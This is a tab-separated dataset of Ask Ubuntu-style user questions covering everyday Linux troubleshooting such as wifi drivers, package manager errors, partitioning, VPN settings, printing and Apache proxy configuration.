401444	my wifi does not work for ssh login or saving some forms	the system works perfectly fine with wired connection . it has problems accessing wifi at my office . however my wifi at my home seems to work fine . i have installed wicd and tried many alternatives but somehow it does not help . pasted below is dump from lshw for wireless . *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 94 : db : c9:49:63:68 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.12.0-7-generic firmware=n/a ip=192.168.0.4 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : f7900000-f797ffff memory : f7980000-f798ffff thanks .
401446	key security fixes - pace of adoption into 12.04 lts	i would like to ask about how quickly security issues are dealt with in the 12.04 disti . i am recently using gnupg on my 12.04 box and am concerned that the following security fix / most up to date version of gpg is not available yet for ubuntu . can someone with more knowledge comment on that ( http : //www.debian.org/security/2013/dsa-2821 ) and more generally regarding how quickly security patches/updates get flowed into the ubuntu package ( http : //www.debian.org/security/ ) . thank you in advance !
401447	creating ssi cluster using ubuntu 12.04	i am wanting to set-up an ssi type cluster using ubuntu 12.04 . i have tried using various guides , the majority of which are for older versions of ubuntu ( which wo n't work with my hardware ) . i 've tried modifying them to work with ubuntu 12.04 , but with no success . methods i 've tried so far include kerrighed and warewulf ( i ca n't find a version of kerrighed which works successfully with version 12.04 , and although warewulf should work , the guides for it are n't particularly clear , so i am having trouble solving the errors i get ) . i am by no means an expert in ubuntu system management , although i am reasonably happy with the basics ( i am ok with managing the system from a command line interface ) . i have managed to get the diskless nodes to boot ok via pxe , but it is the ssi implementation i am struggling with . note that i have good reason to want the system to be ssi - i know that i could achieve something similar with hard disks in each node and running programs via mpi , but this is not what i want . has anyone successfully put together such a type of cluster using 12.04 and , if so , can they provide a step-by-step guide on how to achieve it - or at least point me in the right direction ? any help would be much appreciated as i have now spent many hours working on this with no real end product !
401449	error 1045 ( 28000 ) : access denied for user 'root @ localhost ' ( using password : no )	i got a problem with mysql server actually i am not sure im tring to install quexs cati app on my ubuntu desktop i installed mysql server and php5 and when im trying mysql -u root it says `` error 1045 ( 28000 ) : access denied for user 'root @ localhost ' ( using password : no ) `` but it is okey to enter with mysql -u root -p i couldnt figure it out what is the problem i dont know what should i do any help ?
401452	glibc 2.3 in ubuntu 13.10	i 'm a very new ubuntu user , and i 'm having some issues with my graphics card . i 'm running 13.10 and the graphics are quite slow and glitchy , and my laptop wo n't wake up after suspend . i also am getting a very short battery life . much googling revealed that my system is not using my graphics card at all . sudo lshw -c video had this to say : *-display description : vga compatible controller product : advanced micro devices , inc. [ amd/ati ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:53 memory : e0000000-efffffff ioport:4000 ( size=256 ) memory : f0300000-f033ffff it seems to me that installing amd catalyst drivers would help , and only the newset latest greatest version ( 13.12 ) would support my card ( i ca n't ascertain for sure but it seems my laptop uses an amd radeon hd 7640g card ) . problem is , that version says it requires glibc 2.2 or 2.3 . when i do `` lld -- version '' it returns : ldd ( ubuntu eglibc 2.17-93ubuntu4 ) 2.17 no good . so i need a different version of glibc . but i ca n't seem to find any info anywhere on how to install it on my os . apt-get and synaptic package manager tell me that the latest version is 2.17 . is an earlier version unsafe with ubuntu 13.10 ? should i not be doing this at all ? btw : if i 've made a mistake and the amd catalyst driver is not the way to go , please let me know , and if there is another option ...
401454	how to get sudo access to shares mounted by gigolo	as found around the web or here , i can use gigolo to mount a windows share and even access it through a terminal , via the ~/.gvfs/share on server/ directory , such as ls ~/.gvfs/share\ on\ server/ . unfortunately , when i try to access the same directory from a command via sudo , e.g . sudo ls ~/.gvfs/share\ on\ server/ , it fails with ls : can not access /home/user/.gvfs/share\ on\ server/ : permission denied . any suggestions on how to get sudo access to existing gigolo-mounted shares ? or , how to run gigolo in order to get sudo access to the shares ?
401456	booting problem with windows 7 and ubuntu 12.04	i have 2 hard drives . one of 500gb and other of 20gb . on 20 gb hard drive i had installed ubuntu 12.04 and on 500gb hard drive i had win xp . but today i installed win 7 on 500gb hard drive . but now i can not see that previous boot loader . by default win 7 starts . even i tried changing order of hard drives in `` boot disk priorities '' . but when i select that one hard drive computer does n't start . and when i give priority to other hard drive win 7 starts by default . also in win 7 , in `` my computer '' i can not see 2 partitions , as those i had assigned previously for ubuntu 12.04 . but as i can boot through ubuntu 12.04 , i can not access this 2 partitions how to overcome the problem ? ?
401457	problem with fglrx package	guys , i have a big problem ... whatever i want to do ( at first i wanted reinstall php5 ) , install , remove , upgrade , ... nothing works . i got some error , i 'm really stuck ... here is some , when i try to upgrade : root @ preprod : /var/lib/mysql # aptitude safe-upgrade reading package lists ... done building dependency tree reading state information ... done reading extended state information initializing package states ... done open : 33 ; closed : 4991 ; defer : 9204 ; conflict : 2 othe following packages have unmet dependencies : fglrx : depends : xserver-xorg-core but it is not installable depends : dkms but it is not installable then i tried to install xserver-xorg-core : root @ preprod : /var/lib/mysql # apt-get install xserver-xorg-core reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : cpp-4.4 g++-4.4 gcc-4.4 gcc-4.4-base gcc-4.6-base ifupdown initramfs-tools initramfs-tools-bin initscripts keyboard-configuration lib32gcc1 libc-bin libc-dev-bin libc6 libc6-dev libc6-i386 libdrm-nouveau1a libffi6 libgcc1 libgfortran3 libgl1-mesa-dri libgmp10 libgomp1 libllvm3.0 libmpfr4 libnih-dbus1 libnih1 libplymouth2 libquadmath0 libstdc++6 libstdc++6-4.4-dev libtinfo5 locales mountall plymouth plymouth-theme-ubuntu-text upstart suggested packages : gcc-4.4-locales g++-4.4-multilib gcc-4.4-doc libstdc++6-4.4-dbg gcc-4.4-multilib libmudflap0-4.4-dev libgcc1-dbg libgomp1-dbg libmudflap0-dbg libcloog-ppl0 libppl-c2 libppl7 rdnssd glibc-doc libglide3 libstdc++6-4.4-doc graphviz xfonts-100dpi xfonts-75dpi xfonts-scalable the following packages will be removed : fglrx libdrm-nouveau1 the following new packages will be installed : gcc-4.6-base initramfs-tools keyboard-configuration libdrm-nouveau1a libffi6 libgmp10 libllvm3.0 libnih-dbus1 libquadmath0 libtinfo5 mountall plymouth plymouth-theme-ubuntu-text upstart xserver-xorg-core the following packages will be upgraded : cpp-4.4 g++-4.4 gcc-4.4 gcc-4.4-base ifupdown initramfs-tools-bin initscripts lib32gcc1 libc-bin libc-dev-bin libc6 libc6-dev libc6-i386 libgcc1 libgfortran3 libgl1-mesa-dri libgomp1 libmpfr4 libnih1 libplymouth2 libstdc++6 libstdc++6-4.4-dev locales 23 upgraded , 15 newly installed , 2 to remove and 283 not upgraded . 2 not fully installed or removed . need to get 0b/45.3mb of archives . after this operation , 90.6mb disk space will be freed . but i got this error : e : could not perform immediate configuration on 'plymouth'.please see man 5 apt.conf under apt : :immediate-configure for details . ( 2 ) there are errors anywhere ... i 'm on ubuntu 10.04 tls
401458	iceauthority problem i am not able to start my laptop	so i have a problem , i can not start my laptop because when i want to log in it shows me error : `` could not update iceauthority file/home/frane/.iceauthority.then i log out and i tried a several things in terminal but nothing helps.btw when i write command and i hit enter right away it ask me a password and i am unable to write command in totally .
401459	failure to load swrast driver	i am using ubuntu 13.10 ( in a virtual box ) and i need to run a recent flashplayer . for this , i am using wine and this works for a normal user . i now need to do the same in my build server ( jenkins ) . i am using vncserver for this . when i do this , the build fails with this log : [ debug ] [ launcher ] exec : [ flashplayer ] - /var/lib/jenkins/jobs/flux/workspace/client-domain/target/test-classes/testrunner.swf [ debug ] [ launcher ] creating process [ warning ] [ launcher ] using regular flashplayer tests [ debug ] [ launcher ] executing command : [ flashplayer , /var/lib/jenkins/jobs/flux/workspace/client-domain/target/test-classes/testrunner.swf ] [ debug ] [ net.flexmojos.oss.test.monitor.resulthandler ] opened server socket on port 34936 [ debug ] [ launcher ] process created java.lang.unixprocess @ 43c15a1e [ debug ] [ mojo ] launcher started [ debug ] [ mojo ] pinger started [ debug ] [ mojo ] resulthandler started [ debug ] [ launcher ] output pumpers on [ debug ] [ launcher ] waiting for flashplayer termination [ debug ] [ sysout ] : starting flashplayer using wine [ debug ] [ sysout ] : display=:86 [ debug ] [ mojo ] launcher running [ debug ] [ mojo ] pinger started [ debug ] [ mojo ] resulthandler started [ debug ] [ syserr ] : p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : /usr/lib/i386-linux-gnu/pkcs11/p11-kit-trust.so : can not open shared object file : no such file or directory [ debug ] [ mojo ] launcher running [ debug ] [ mojo ] pinger started [ debug ] [ mojo ] resulthandler started [ debug ] [ mojo ] launcher running [ debug ] [ mojo ] pinger started [ debug ] [ mojo ] resulthandler started [ debug ] [ syserr ] : libgl error : failed to load driver : swrast [ debug ] [ syserr ] : libgl error : try again with libgl_debug=verbose for more details . [ debug ] [ syserr ] : err : wgl : x11drv_winegl_initopenglinfo could n't initialize opengl , expect problems [ debug ] [ syserr ] : fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x33e0e8,0x00000000 ) , stub ! [ debug ] [ syserr ] : fixme : thread : start_thread started native thread 0000002b [ debug ] [ syserr ] : segmentation fault ( core dumped ) [ debug ] [ launcher ] flashplayer closed [ debug ] [ launcher ] runtime exit as expected [ debug ] [ mojo ] launcher done [ debug ] [ mojo ] pinger started [ debug ] [ mojo ] resulthandler started the most important line is probably : [ debug ] [ syserr ] : libgl error : failed to load driver : swrast i can reproduce this error with glxinfo running as the jenkins user : the strange thing is that i can start flashplayer this way ( manually from the command line as the jenkins user ) without an issue . but starting this same flashplayer script ( which in turn starts wine to start the flashplayer .exe ) in a jenkins build fails with the same message as glxinfo : jenkins @ wdb-vb-java7 : ~/jobs/flux/workspace/client-domain $ libgl_debug=verbose glxinfo name of display : :1 libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/tls/swrast_dri.so libgl : opendriver : trying /usr/lib/x86_64-linux-gnu/dri/swrast_dri.so libgl error : failed to load driver : swrast error : could n't find rgb glx visual or fbconfig error : could n't find rgb glx visual or fbconfig this question is similar to why does `xvfb-run glxgears` fail with an swrast error ? but i am using vncserver instead of xvfb , but they might have the same root cause .
401460	privateinternetaccess.com vpn settings problems	i 'm running ubuntu 13.04 i followed the instructions on the website and everything is set up . i have this service set up on my sister 's pc and my mother 's mac . but , when i installed it on ubuntu , it never works unless i keep the cipher and hmac authentication settings as both `` default '' . the cipher and hmac , under advanced settings in the vpn `` config menu , seem to only work on the `` default '' setting . what is the default and why ca n't i set it to my preferred encryption level - 256 aes cbc/cfb and sha - 512 ? these are the instructions i used : https : //www.privateinternetaccess.com/pages/client-support/ # linux_ubuntu_openvpn_12_04 here is a step-by-step guide , in screenshots . the following four links should show you what i 'm talking about : ⠀http : //postimg.org/image/sdi03wy85/ ⠀http : //postimg.org/image/fonpk8s3p/ ⠀http : //postimg.org/image/8zh6486rp/ ⠀http : //postimg.org/image/oaqz4u43p/ when i go to edit my vpn settings this is what i encounter : vpn settings i select `` configure vpn ... '' once inside the `` network connections box '' i select a vpn connection to edit , in this case pia - california , and then select `` edit '' . then a box appears with three tabs ... general , vpn , and ipv4 settings ... under the vpn tab i select `` advanced '' . under `` openvpn advanced options '' i find 4 tabs ... .general , security , tls authentication , and proxies . i select the security tab and there are two choices : '' cihper '' and `` hmac authentication '' both of which are set at `` default '' . i do n't know what default is and when i try to change either to a security setting i know it does n't work anymore . what is the `` default '' ?
401464	e : could not open file /var/lib/dpkg/status - open ( 2 : no such file or directory )	when i use sudo apt-get update i get following error . e : could not open file /var/lib/dpkg/status - open ( 2 : no such file or directory ) e : the package lists or status file could not be parsed or opened .
401466	movies on dvd , how ?	i want to put a movie on a dvd and then watch them on my t.v . how can i do that ? when i put a movie on a dvd and then put it on my t.v it ca n't read it . thank you !
401472	fix slow graphics performance on ubuntu 13.04	i 'm using ubuntu 13.04 slow performance . then i upgraded the os but graphics card was not starting at low level . my system config ... . memory 2.0gib processor amd athlon ( tm ) 64 x2 dual core processor 4000+ ă 2 graphics gallium 0.4 on llvmpipe ( llvm 3.2 , 128 bits ) os type 32 bit disk 76.5gb how do i increase the performance ? can anyone help me out with this problem ?
401473	how to add `` scan with comodo antivirus '' to right-click drop down menu ?	i just have installed comodo antivirus on my netbook in order to be sure that i do n't share viruses with my windows friends . although i like it and gives me the opportunity to run personalized scans , i would like to do it in a more easier way , without so many steps . i would like a right-click menu integration . in order to be more clear , i give this you this example . in the image below , i wanted to scan my flash drive ( zorin os live ) , and in order to do that , i had to create a new scan with its name . the advantage is that i can scan the entire flash drive , not just a a file or folder . but i wont to add comodo in the right click menu like i did with bitdefender . the advantage in bitdefender 's case is obvious although , there is a shortcomming in teh fact that i ca n't scan the entire flash drive at once , but i have to explore it and scan the files and folders one by one . even so , i would like to add comodo to the menu like i did with bitdefender . by the way , adding bitdefender was a real complicated task . i hope that in comodo 's case things are not that tricky . anyway , you guys , have more experience than me , so i guess that you have found a way to do that . i would like to hear your suggestions .
401481	opening weblinks in polly through firefox	i 'm relatively new to this forum and therefore hope that this site is actually the right place for asking the following question . i am running ubuntu 12.04 and have polly installed as my twitter-client . i like to work in different workspaces , so for example i would have polly on one workspace and than firefox on another . whenever i want to check out a link that is posted in some tweet it opens in firefox without actually switching to the firefox application for me to read it straight away . thus my question is whether it is possible to automatically switch to firefox ( whether it is running in a different workspace or not ) whenever i click on a link that is one of the tweets displayed in polly . regards , jacob
401484	how do i restore a single file with deja dup / nautilus 3.8 ?	all tutorials say i have to go to the `` file '' menu and hit some sort of restore button , which does not consider that this freaking new file manager does not even have a menu bar . how am i supposed to reach this option ? also , there 's nothing fitting in the context menu or the options menu on the right side of the nautilus panel .
401486	can not make shell file excecutable	read-only file system error when trying to make shell file excecutable . fix ?
401487	how can i calculate the traffic on an ethernet port ?	i want a c program which runs on any c compiler ( like codeblock , eclipse , etc. ) . its output should be the traffic on an ethernet port . does such a program exist ?
401489	why device files do not open with vim or nano	root @ heena : /dev/disk/by-label # ls pendrive system\x20reserved now when i open pendrive using vim or nano , i get an empty file . but i understand that everything is file in linux including pendrive . question is why nano or vim is unable to open and show the real content of the file , if even devices are considered as file in linux ?
401490	no ubuntu partitions on installed dual boot system	i have both ubuntu 12.04 and windows 7 and dual booting . ubuntu has 10gb of space and i 'm running out of space . i want to increase this to 100gb , so i went to the windows disk manager , it shows 100mb fat16 , 14gb recovery ntfs , 540gb os ntfs . there are no partitions shown for ubuntu/linux in either the windows disk manager or gparted . i used windows disk manager to free up 100gb of space on my hard drive , is there a way to transfer my installed ubuntu onto the new partition ? apparently , my existing install must be on wubi , though i do n't recall installing it there .
401491	install navicat on linux ubuntu 13.10 64 bit	at navicat wiki http : //wiki.navicat.com/wiki/index.php/can_i_run_navicat_on_64-bit_linux % 3f , to run navicat , need install all 32 bit libraries with this command : sudo apt-get install ia32-libs this command work fine before ubuntu 13.10 , but on 13.10 box , me get this error : package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate i have install the suggested package : lib32z1 lib32ncurses5 lib32bz2-1.0 but navicat still wo n't run . please , , help me..
401497	i forgot my password of my user account	this is my first time using ubuntu and i forgot my user account password so how can i change my user password or do i have to create a new user account ? i can not upgrade my application because i forgot the password . i use ubuntu 11.10 . someone please help me !
401499	vmbuilder preallocate disk space	when creating a vm with vmbuilder how can i preallocate the disk space ? i 'm currently using the format below to create a vm which should create a 10gb root disk ( and it does ) , the only problem i 'm facing is that i want to preallocate those 10gb on the host . how can this be achieved ? vmbuilder kvm ubuntu \ -v \ -- suite=precise \ -- libvirt=qemu : ///system \ -- arch=amd64 \ -- cpus= < number_cpus_here > \ -- mem= < amount_ram_here > \ -- swapsize=1024 \ -- rootsize=10240 \ -- flavour=server \ -- hostname= < hostname_here > \ -- ip= < ip_address_here > \ -- mask= < netmask_here > \ -- net= < network_here > \ -- bcast= < broadcast_ip_here > \ -- gw= < gateway_here > \ -- dns= ' < dns_here > ' \ -- bridge= < bridge_here > \ -- mirror= < mirror_here > \ -- components='main , universe ' \ -- addpkg=openssh-server , acpid \ -- user=root \ -- pass= < password_here > \ -- dest=/tmp/ < hostname_here > \ -- tmpfs=-
401502	is possible to recover a file removed with scp ?	i was using scp command to send a file from my laptop to desktop . which overwrite the previous file on desktop with the same name . is there any way to retrieve the previous file ? thank you in advance for help .
401503	resized partition with gparted size with df -h	i have ubuntu server running in virtualbox . i had an 8gb ( default vdi size ) and i needed more space so i used a 2 steps method : vboxmanager and an iso with gparted . i also installed parted on ubuntu and i get the following message : ( parted ) print model : ata vbox harddisk ( scsi ) disk /dev/sda : 52.4gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 256mb 255mb primary ext2 boot 2 257mb 19.1gb 18.8gb extended 5 257mb 19.1gb 18.8gb logical lvm the 52gb are added from vboxmanager and only added 10 gb to the already existing partition . using df -h i get the following : filesystem size used avail use % mounted on /dev/mapper/kvg-root 6.5g 6.2g 52m 100 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 488m 4.0k 488m 1 % /dev tmpfs 100m 1.9m 98m 2 % /run none 5.0m 0 5.0m 0 % /run/lock none 498m 0 498m 0 % /run/shm none 100m 0 100m 0 % /run/user /dev/sda1 228m 156m 60m 73 % /boot only 6.5gb which is the old size . i saw the answer from here root partition size remains same after partition resize with gparted but i get the following : resize2fs 1.42.5 ( 29-jul-2012 ) open : is a directory while opening / or : sudo resize2fs /dev/mapper/kvg-root resize2fs 1.42.5 ( 29-jul-2012 ) the filesystem is already 1764352 blocks long . nothing to do ! what should i do so that df -h will output the right values and use the new extra space ?
401506	operating system was n't found	how to resolve this error ? an operating system was n't found .try disconnecting contain an operating system press ctrl+alt+del to restart how to fix this problem after partitioning hdd ?
401507	ifconfig problem in ubuntu 13	i have a working setup where i communicate over ethernet between an embedded processor and a pc running ubuntu 12 . nothing special : i just plug an ethernet cable , set static ips using ifconfig and everythign works . the strage thing is that if i do the same with ubuntu 13 , nothing works . ifconfig seems to work correctly , but the interface stays mute . even with wireshark i see no packets over the line . making the configuration with network manager has the same result . i checked and all configurations ( interfaces , iptables , etc ... ) are the same . is it an ubuntu 13 bug ? thanks , michele
401510	tried but unable to install ubuntu 13.10	i m new to ubuntu . i heard n read about it n decided to hive it a try . i have dell inspirion n5010 loaded with windows 7 . it is 32 bit n have ram 2 gb . my hard drive is 320 gb and is divide in 3 partition . i downloaded ubuntu 13.10 burned it in dvd . i restarted my laptop with dvd in it . first it did n't detect dvd so i restarted it again and choose boot option to dvd . it started booting from dvd but after i selected install alongside with windows 7 . it just ejects dvd . and me to press enter . it restarts again . i tried many times but was able to install it . n some time after ejecting dvd when i press enter terminal/cmd screen shows up with msg live media not detected . what is going on ? can you guys provide me some solution ? regards rabi rajbhandari
401511	proxy stopped working after 13.10 upgrade	i had a perfectly working site running with 13.04 . after do-release-upgrade the tomcat server is running and answering calls . but i can not get apache2 to proxy the requests anymore . it will not proxy to google ( as a test ) or my own site for that matter . any ideas ? a2enmod proxy_http considering dependency proxy for proxy_http : module proxy already enabled module proxy_http already enabled vhost < virtualhost *:80 > servername scoring.megahooked.com proxyrequests on proxypreservehost on < proxy * > order deny , allow allow from all < /proxy > proxypass / http : //google.com proxypassreverse / http : //google.com # proxypass / http : //megahooked.com:8080/bowling/faces/ # proxypassreverse / http : //megahooked.com:8080/bowling/faces/ < /virtualhost > from the proxy.conf proxyrequests on # < proxy * > # adddefaultcharset off # require all denied # require local # < /proxy > request 81.231.233.44 - - [ 07/jan/2014:13:55:57 +0100 ] `` get / http/1.1 '' 200 480 `` - '' `` mozilla/5.0 ( windows nt 6.2 ; wow64 ) applewebkit/537.36 ( khtml , like gecko ) chrome/31.0.1650.63 safari/537.36 ''
401513	shut off smart install	after installing ubuntu 13.10 my hp300c-m351a does n't work any more . i am completely unable to shut off smart install . hp-doctor is unable to remove smart install . so i tried do do it manually . after running the script i 've been told it was shut off but whilst trying to install the printer i 've got the message smart install was still running .
401514	dpkg : error : can not scan updates directory `/var/lib/dpkg/updates/ ' : no such file or directory	when i use sudo apt-get install lamp-server i get following error . dpkg : error : can not scan updates directory `/var/lib/dpkg/updates/ ' : no such file or directory e : sub-process /usr/bin/dpkg returned an error code ( 2 ) how to solve this problem ?
401520	what are the main differences between ubuntu desktop and ubuntu touch ?	now that ubuntu for phones is mature enough and established , can someone intimately familiar can explain what are the main differences between the two . where the two diverge to the point of being incompatible ?
401521	my approach for replacing current ubuntu with newer	i 'm working on ubuntu 13.04 currently . i want to replace it with ubuntu 13.10 . for the same , please approve whether my approach mentioned below is right ! i have created a bootable usb stick having ubuntu 13.10 . before proceeding ahead i would like to add how i prepared my usb stick . using fdisk , i deleted all the partitions on the stick . i created only 1 new partition to occupy whole 2gb of space of my usb stick . then using mkfs created file system of ext4 type . then using unetbootin created bootable ubuntu 13.10 from its iso . when my laptop boots from the usb , the below options are displayed as shown in the photo . ( its not having the option for erasing the current o.s . rather it has option for erasing the whole disk ! ! ! ) i will select the option of ' something else ' & proceed . then i will delete /dev/sda5 ( /boot ) & /dev/sda6 ( / ) & swap partition & create the same partitions ( /boot , / & swap ) by allocating sizes . ( i think there is no compulsion to create home partition & so i wont create ) .then i will proceed to install 13.10 on these newly created partitions . after the installation completes , i will login to the 13.10 o.s . then i will delete all files & folders under /home directory . then i will edit /etc/fstab to mount the previous home partition /dev/sda8 ( this i currently have on 13.04 ) on /home directory . is that a right way please ? also , may i create btrfs file systems this time rather than ext4 for the /boot & / partitions ? this fs is new & i should try it out to see how it 's better .
401522	how to set the timeout for sudo asking for password ?	for example if i run sudo apt-get install vlc , it asks me to enter the sudo password . if i not enter the password for sudo it [ sudo ] password for avinash : remains for longtime . how do i set this sudo password waiting time ? if this waiting time expires , it automatically shows time expires.is that possible ? note : i am not asking about how long sudo remembers the password ( rootsudotimeout - community ubuntu documentation ) .
401526	how to restore unity buttons style to default ?	trying to compile ardour software i installed all the libraries required . during this process something messed up the buttons in unity . its very easy to see the problem in the firefox panels buttons . the buttons are now like old fashion ; very straight lines ( like in windows 3.11 lol ) . what could have done that and how can i restore the original unity look and feel ? here 's some images : firefox , this same window , with ugly tab buttons : : in this window , the buttons are all old fashioned : : i have tried : sudo apt-get autoremove -- purge light-themes sudo apt-get install light-themes then restart my system , but no way ... its still the same ; here 's the packages i installed and that i think one of them is responsible for the mess : package base version download libsndfile 1.0.25 ardour.org/files/deps/libsndfile-1.0.25.tar.gz gnomecanvas 2.30.3 ardour.org/files/deps/libgnomecanvas-2.30.3.tar.gz libsigc++ 2.2.10 ardour.org/files/deps/libsigc++-2.2.10.tar.bz2 cairo 2.2.10 ardour.org/files/deps/cairo-1.12.14.tar.xz gtk+ ( for x11 ) 2.24.18 ardour.org/files/deps/gtk+-2.24.18-x11.tar.bz2 lrdf 0.5.0 ardour.org/files/deps/liblrdf-0.5.0.tar.gz after this problem , i 've reinstalled gnomecanvas and libgtk* ( using synaptic and marking them for reinstallation ) . but the problem still persists . well , now i have an example of how those buttons where like when they where right . this printscreen is from my other ubuntu computer :
401530	how to add index folder pattern to gnome tracker ?	is there any way to add folder pattern to meta tracker search on gnome3.10 ex : ( *.wiki ) folder.wiki nfolde.wiki etc
401531	ubuntu 13.10 gnome 3.9.90 window top bar	so , i install gnome 3.10 , remove them and after all operations some windows become like on screenshot . what 's the problem ?
401532	dual-boot tool for nexus 4	good morning , i have a nexus 4 and i wonder if canonical or someone has some tool to do a dual-boot as grub for pc ... allowing boot of android or ubuntu on the same device . thanks
401537	i 'm having issues w/12.04 and want to remove it	i built and installed 12.04 about 3 years ago . i have a 1t hard drive and 4g of ram ... nothing special , but it ran great . but then , i ran into an issue where my internet started acting up , so i made some adjustments removing some plug-ins that i felt were unneeded ; too many programs junking up my computer . then i started to have issues with the password ... none of these things should have affected one another . but now the issues were starting to build . however , being the semi-tech savvy person that i am , i researched the issues and nothing . so , i assumed that there must be a bad plug-in that started all of these issues . i have tried to repair and reinstall and now i have the 12.04 lts as my os , but now , when i start up , it still has issues . start up ; logs in automatically , i try to use the internet , it does n't run at all ... it just sits there . i log out and try to log back in ; tells me there 's a passwords error . so it wo n't let me log in , even though i know that the password is correct and i have to reboot and then it lets me in . smh ... so , i want to remove 12.04 all together ! i wanted to do a dual installation , just bc somethings are easier to deal with in windows than ubuntu , so i want to remove this os completely and install 13.10 and windows . please . but , i am getting conflicting information about how to do so . but , bc i was n't raised on dos based systems ... i need help .
401539	printing problem in hp laserjet 4250 in ubuntu 10.04	i have a hp laserjet 4250 printer in ubuntu 10.04 . i am getting the following error when printing self-test page : /usr/lib/cups/backend/lpd failed . here are the output of the lpstat -t : arun @ arun-desktop : ~ $ lpstat -t scheduler is running system default destination : sslprinter device for sslprinter : lpd : //10.192.19.14 sslprinter accepting requests since tuesday 07 january 2014 07:22:22 am ist printer sslprinter is idle . enabled since tuesday 07 january 2014 07:22:22 am ist /usr/lib/cups/backend/lpd failed sslprinter-17 arun 1024 tuesday 07 january 2014 06:37:15 am ist another output : arun @ arun-desktop : ~ $ sudo cat /etc/cups/printers.conf # printer configuration file for cups v1.4.3 # written by cupsd # do not edit this file when cupsd is running < defaultprinter sslprinter > info hp laserjet 4250 location ssl lab makemodel hp laserjet 4250 postscript ( recommended ) deviceuri lpd : //10.192.19.14 state idle statetime 1389057407 type 8425668 filter application/vnd.cups-raw 0 - filter application/vnd.cups-command 0 commandtops filter application/vnd.cups-postscript 0 - accepting yes shared yes jobsheets none none quotaperiod 0 pagelimit 0 klimit 0 oppolicy default errorpolicy retry-job < /printer > arun @ arun-desktop : ~ $ how to solve this problem
401540	how do i get others to know about my fork/developed application ?	i forked hsetroot into mhsetroot then added a lot of more features , but how do i promote it to the public so they know it is available for downloading and checking it out and hopefully enjoying it and using it for there wallpaper setting utility ?
401545	ioctl ( siocgifindex ) failed in ubuntu 12.04 .. unknown chipest .. aircrack running problem	on 12.04 ; ralink ( hp ) i have problem running air-crack .. when i put airmon-ng , the chipset is unknown instead of giving me ralink .. and it respond wih ioctl ( siocgifindex ) failed .. what should i do to fix it ?
401547	android sdk manager permission denied	i am setting up eclipse and adt everything is working fine java , android virtual devices and everything except the adt sdk manager it says permission denied . /home/yousaf/android-sdks/tools/android : 84 : java : permission denied /home/yousaf/android-sdks/tools/android : 101 : java : permission denied exec : 114 : java : permission denied i have executable permission on this folder and files owner is my own user and i have tried to run this as root but same results . here are the permissions for that file -rwxrwxrwx 1 yousaf yousaf 3498 2014-01-07 13:27 /home/yousaf/android-sdks/tools/android
401548	orignal network proxy settings	what are the original network proxy settings in ubuntu 12.04 ? i changed my network proxy settings but now i ca n't download any software from ubuntu software centre . an error occurs `` failed to downlaod package files , check your internet settings '' . can anyone help me with this problem ? what should i do ?
401550	how can i download youtube videos one after another automatically from terminal	how can i download youtube videos one after another automatically from terminal ? is there any chance to download youtube videos one after the another automatically from terminal ? ?
401552	high `` system '' cpu usage , no irqs to blame	i have a wyse v50l 800mhz terminal with ubuntu server 12.04.3 . the problem i 'm having is high `` system '' cpu load while exchanging files with the terminal . example - downloading a file via ssh - connected by a wifi 'g ' network : cpu ( s ) : 17.1 % us , 59.4 % sy , 0.0 % ni , 20.3 % id , 0.0 % wa , 0.0 % hi , 3.2 % si , 0.0 % st mem : 1010288k total , 925260k used , 85028k free , 131196k buffers swap : 0k total , 0k used , 0k free , 682244k cached pid user pr ni virt res shr s % cpu % mem time+ command 31595 root 20 0 0 0 0 s 28.9 0.0 3:16.60 kworker/u:0 30937 root 20 0 0 0 0 r 27.6 0.0 3:55.44 kworker/u:1 31977 ubuntu 20 0 10880 2644 848 s 16.6 0.3 2:58.19 sshd 32154 root 20 0 0 0 0 s 1.9 0.0 0:10.50 kworker/0:0 31978 ubuntu 20 0 2576 780 648 s 1.3 0.1 0:15.76 sftp-server as shown , system load around 60 % , while sshd takes only 16 % , wa is 0 . the problem is that i 'm unable to get transfers higher than about 700kb/s . also the same happens when : downloading without encryption for example by ftp or http , or using a wired connection ( using the built-in ethernet card ) the network adapters are : ethernet controller : via technologies , inc. vt6102 [ rhine-ii ] ( rev 8d ) ( pci ) id 148f:2573 ralink technology , corp. rt2501/rt2573 wireless adapter ( usb ) but as i say it happens on both , so i guess they have nothing to do with it . i tried to find out what 's causing high `` sy '' load , and found this website : http : //honglus.blogspot.com/2010/01/troubleshooting-high-system-cpu-usage.html but in the case that was described high `` sy '' load was caused by irqs , and in my case irqs do n't use up cpu , so i ca n't troubleshoot it further using the hints from the above website : mpstat 2 02:08:13 pm cpu % usr % nice % sys % iowait % irq % soft % steal % guest % idle 02:08:15 pm all 15.71 0.00 60.73 0.00 0.00 0.52 0.00 0.00 23.04 how else can i find what 's causing high `` sy '' cpu load , and why does my network work so slow ?
